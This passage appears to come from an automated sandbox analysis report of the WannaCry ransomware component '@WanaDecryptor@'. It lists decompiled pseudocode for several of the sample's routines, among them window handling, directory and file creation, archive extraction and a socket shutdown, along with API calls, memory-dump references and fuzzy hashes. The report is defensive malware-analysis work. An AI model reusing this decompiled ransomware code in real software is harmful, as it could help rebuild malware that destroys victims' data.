                                  • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                  • GetSysColor.USER32(0000001B), ref: 0040865C
                                  • #6140.MFC42(00000002,000000FF), ref: 00408667
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Color$#341#567#6140CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2603677082-0
                                  • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                  • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5);
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15);
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}





                                  0x0040b628
                                  0x0040b62e
                                  0x0040b632
                                  0x0040b638
                                  0x0040b651
                                  0x0040b660
                                  0x0040b663
                                  0x0040b66a
                                  0x0040b671
                                  0x0040b678
                                  0x0040b67e
                                  0x0040b685
                                  0x0040b689
                                  0x0040b689
                                  0x0040b685
                                  0x0040b690

                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                  • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                  • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                  • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                  • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                  • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                  • BringWindowToTop.USER32(00000000), ref: 0040B678
                                  • ExitProcess.KERNEL32 ref: 0040B689
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID:
                                  • API String ID: 962039509-0
                                  • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                  • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fclose$fopenfreadfwrite
                                  • String ID: c.wnry
                                  • API String ID: 2140422903-3240288721
                                  • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                  • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0); // executed
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}













                                  0x0040b6a8
                                  0x0040b6b4
                                  0x0040b6c1
                                  0x0040b6ca
                                  0x0040b6cf
                                  0x0040b6d1
                                  0x0040b6d6
                                  0x0040b6f7
                                  0x0040b6ff
                                  0x0040b709
                                  0x0040b70e
                                  0x0040b712
                                  0x0040b717
                                  0x0040b726
                                  0x0040b72a
                                  0x0040b72c
                                  0x0040b733
                                  0x0040b74e
                                  0x0040b75d
                                  0x0040b762
                                  0x0040b765
                                  0x0040b766
                                  0x0040b72c
                                  0x0040b76b
                                  0x0040b77f
                                  0x0040b71c
                                  0x0040b725
                                  0x0040b725
                                  0x0040b6d8
                                  0x0040b6d9
                                  0x0040b6eb
                                  0x0040b6eb

                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                  • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeleteDirectoryFile
                                  • String ID: %s\%s
                                  • API String ID: 3195586388-4073750446
                                  • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                  • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				long _t30;
				void* _t34;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									_t30 = SetFilePointer(_t44, 0, 0, 1); // executed
									 *(_t46 + 0xc) = _t30;
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t34 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
							_t44 = _t34;
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1); // executed
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}











                                  0x004108a2
                                  0x004108ab
                                  0x004108c8
                                  0x004108cc
                                  0x004108ce
                                  0x004108d3
                                  0x004108d9
                                  0x004108dd
                                  0x00410915
                                  0x00410919
                                  0x00000000
                                  0x004108df
                                  0x004108e2
                                  0x00410938
                                  0x00410938
                                  0x0041093a
                                  0x00410945
                                  0x00410947
                                  0x00410980
                                  0x00410985
                                  0x00410988
                                  0x0041098b
                                  0x0041098e
                                  0x00410992
                                  0x00410999
                                  0x004109a2
                                  0x004109a8
                                  0x004109a8
                                  0x004109b4
                                  0x004109bb
                                  0x0041094e
                                  0x00410956
                                  0x0041095d
                                  0x00410962
                                  0x00410965
                                  0x00410969
                                  0x0041096d
                                  0x00410970
                                  0x00410973
                                  0x0041097b
                                  0x0041097b
                                  0x004108e4
                                  0x004108fb
                                  0x00410901
                                  0x00410906
                                  0x00410920
                                  0x00410925
                                  0x0041092c
                                  0x00410935
                                  0x00000000
                                  0x00410908
                                  0x00410908
                                  0x00410914
                                  0x00410914
                                  0x00410906
                                  0x004108e2
                                  0x004108b7
                                  0x004108be
                                  0x004108c7
                                  0x004108c7

                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                  • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Pointer$#823Create
                                  • String ID:
                                  • API String ID: 3407337251-0
                                  • Opcode ID: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                  • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                  • Opcode Fuzzy Hash: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                  • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				int _t22;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32); // executed
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520); // executed
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						_t22 = CreateDirectoryA( &_v520, 0); // executed
						return _t22;
					}
				}
			}

























                                  0x00412250
                                  0x00412257
                                  0x00412261
                                  0x00412264
                                  0x0041226d
                                  0x00412272
                                  0x00412272
                                  0x0041226d
                                  0x00412278
                                  0x0041227f
                                  0x00412284
                                  0x0041235a
                                  0x0041235a
                                  0x0041228a
                                  0x0041228a
                                  0x0041228c
                                  0x0041228e
                                  0x00412291
                                  0x00412298
                                  0x00412298
                                  0x0041229a
                                  0x0041229d
                                  0x0041229e
                                  0x004122a6
                                  0x004122aa
                                  0x004122ac
                                  0x004122b7
                                  0x004122ba
                                  0x004122c1
                                  0x004122c1
                                  0x004122c1
                                  0x004122c3
                                  0x004122d4
                                  0x004122d9
                                  0x004122d9
                                  0x004122de
                                  0x004122e3
                                  0x004122f0
                                  0x004122f2
                                  0x004122f8
                                  0x004122fc
                                  0x00412306
                                  0x00412306
                                  0x00412306
                                  0x00412306
                                  0x00412313
                                  0x00412315
                                  0x00412319
                                  0x0041231b
                                  0x00412322
                                  0x00412327
                                  0x0041232a
                                  0x00412336
                                  0x00412338
                                  0x00412343
                                  0x00000000
                                  0x00412345
                                  0x0041234c
                                  0x00000000
                                  0x0041234c
                                  0x00412343

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,?,?), ref: 00412264
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                  • GetFileAttributesA.KERNELBASE(00000000), ref: 00412338
                                  • CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesCreateDirectoryFile
                                  • String ID:
                                  • API String ID: 3401506121-0
                                  • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                  • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00412A00(intOrPtr* _a4) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10); // executed
								L00412C98(); // executed
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14); // executed
						L00412C98(); // executed
						return  *0x4220dc;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}








                                  0x00412a01
                                  0x00412a07
                                  0x00412a18
                                  0x00412a27
                                  0x00412a27
                                  0x00412a33
                                  0x00412a38
                                  0x00412a3a
                                  0x00412a42
                                  0x00412a44
                                  0x00412a45
                                  0x00412a4a
                                  0x00412a4a
                                  0x00412a4d
                                  0x00412a53
                                  0x00412a5f
                                  0x00412a61
                                  0x00412a62
                                  0x00412a67
                                  0x00412a67
                                  0x00412a6a
                                  0x00412a6b
                                  0x00412a75
                                  0x00412a7a
                                  0x00412a7a
                                  0x00412a7d
                                  0x00412a7e
                                  0x00412a8d
                                  0x00412a1a
                                  0x00412a20
                                  0x00412a25
                                  0x00412a25
                                  0x00412a09
                                  0x00412a0f
                                  0x00412a14
                                  0x00412a14

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                  • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                  • Opcode Fuzzy Hash: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                  • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketsendsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 4063721217-0
                                  • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                  • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}




                                  0x004043e1
                                  0x004043e3
                                  0x004043ea
                                  0x004043ec
                                  0x004043f1
                                  0x004043f6
                                  0x004043f7
                                  0x004043fe
                                  0x00404402
                                  0x00404408

                                  APIs
                                  • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                  • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                  • #5277.MFC42 ref: 00404402
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3874#4284#5277
                                  • String ID:
                                  • API String ID: 1717392697-0
                                  • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                  • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411660 Relevance: 3.9, APIs: 3, Instructions: 156COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00411660() {
				signed int _t57;
				signed int _t59;
				unsigned int _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t71;
				signed char _t86;
				intOrPtr* _t100;
				void* _t101;
				signed int _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;

				_t100 =  *((intOrPtr*)(_t105 + 0x18));
				if(_t100 != 0) {
					__eflags =  *(_t100 + 0x18);
					if( *(_t100 + 0x18) != 0) {
						__eflags =  *(_t100 + 0x7c);
						if(__eflags != 0) {
							E00411AC0(_t100);
							_t105 = _t105 + 4;
						}
						_t57 = E00411460(__eflags, _t100, _t105 + 0x14, _t105 + 0x18, _t105 + 0xc);
						_t106 = _t105 + 0x10;
						__eflags = _t57;
						if(_t57 == 0) {
							_t101 = malloc(0x84);
							_t107 = _t106 + 4;
							__eflags = _t101;
							if(_t101 != 0) {
								_t59 = malloc(0x4000); // executed
								 *_t101 = _t59;
								 *((intOrPtr*)(_t101 + 0x44)) =  *((intOrPtr*)(_t107 + 0x1c));
								_t108 = _t107 + 4;
								__eflags = _t59;
								 *((intOrPtr*)(_t101 + 0x48)) =  *((intOrPtr*)(_t107 + 0x10));
								 *((intOrPtr*)(_t101 + 0x4c)) = 0;
								if(_t59 != 0) {
									 *((intOrPtr*)(_t101 + 0x40)) = 0;
									__eflags =  *(_t100 + 0x34);
									 *(_t101 + 0x54) =  *(_t100 + 0x3c);
									 *((intOrPtr*)(_t101 + 0x50)) = 0;
									 *(_t101 + 0x64) =  *(_t100 + 0x34);
									 *((intOrPtr*)(_t101 + 0x60)) =  *_t100;
									__eflags =  *(_t100 + 0x34) != 0;
